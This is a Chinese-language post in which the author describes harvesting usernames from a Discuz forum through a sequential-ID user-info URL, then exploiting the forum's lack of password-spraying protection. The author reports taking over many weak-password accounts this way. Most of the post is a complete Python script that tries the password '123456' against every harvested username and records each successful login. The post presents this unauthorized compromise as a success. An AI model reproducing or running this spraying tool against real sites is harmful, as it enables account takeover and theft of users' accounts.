在某discuz论坛上发现发帖的用户都是登录名做昵称,故注册了一个帐号进行登录,仔细分析之后,发现有一个url会根据id返回相应的基本用户信息,而信息里面包含了用户名!并且id是顺序递增的,这意味着我们是可以使用脚本大批量获取该站点的用户名的。此外,经过手动验证,该论坛的登录只做了纵向暴力破解防御,而横向防暴力破解是没有的,结合这两点拿下了该站点很多使用弱口令的账户。
注:
纵向暴力破解:即对单一账户使用不同的密码进行尝试,如果应用有做防御,一般会出现验证码或者锁定之类的现象。
横向暴力破解:即使用单一弱口令尝试登录不同的账户。一般情况下,为了用户体验,都会有至少3次的尝试机会,因此,如果使用高频率的密码进行尝试,则命中率是比较高的。
获取用户名脚本(此处略)。
横向暴力破解脚本:
1 #coding:utf-8, 2 import sys,urllib,urllib2,cookielib,time; 3 4 url1 = "http://www.xxx.com/mobile/xxx-login.html"; 5 url2 = "http://www.xxx.com/mobile/xxx-post_login.html"; 6 7 def s_request(url,data,step): 8 req = urllib2.Request(url); #构造要发送的request内容 9 if(data != None): 10 req.add_data(data); 11 req.add_header("Proxy-Connection","keep-alive"); 12 req.add_header("Accept-Language","zh-CN,zh;q=0.8,en;q=0.6"); 13 req.add_header("User-Agent","Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36"); 14 if(step == 1): 15 req.add_header("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"); 16 req.add_header("Cookie","vary=ad6b4f8d4c39539fa40661c653cd4a4f6b65742dbf71bbea39c0f33572385dc0; Hm_lvt_4f2975be01c8951042db4fd8dd38717b=1399626611,1399700907,1399774576"); 17 else: 18 req.add_header("Accept","application/json"); 19 req.add_header("Referer","http://www.xxx.com/mobile/xxx-login.html"); 20 req.add_header("Content-Type","application/x-www-form-urlencoded"); 21 req.add_header("X-Requested-With","XMLHttpRequest"); 22 resp = urllib2.urlopen(req); #发送request,返回文件描述符 23 str = resp.read(); 24 # print str; 25 if(str.find("success")!=-1): #存在success表示登录成功 26 return 1 27 else: 28 return 0; 29 30 #自动带上cookie 31 cj = cookielib.CookieJar(); 32 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)); 33 urllib2.install_opener(opener) 34 35 u = open("D:\uid\uname.txt","r"); 36 l = open("D:\uid\record.txt","a"); 37 s_request(url1,None,1); #通过url1获取cookie 38 39 while 1: 40 user = u.readline(); 41 if(len(user) == 0): 42 break; 43 user = user.replace(' ',''); 44 print user; 45 data = {"returnUrl":"http%3A%2F%2Fwww.xxx.com%2Findex.php","password":"123456","uname":user,}; 46 data = urllib.urlencode(data); 47 if(s_request(url2,data,2) == 1): #尝试登录 48 l.write(user+":"+"123456"+" "); #将用户名和密码记录到文件 49 l.flush(); 50 s_request(url1,None,1); #重新获取cookie 51 u.close(); 52 l.close();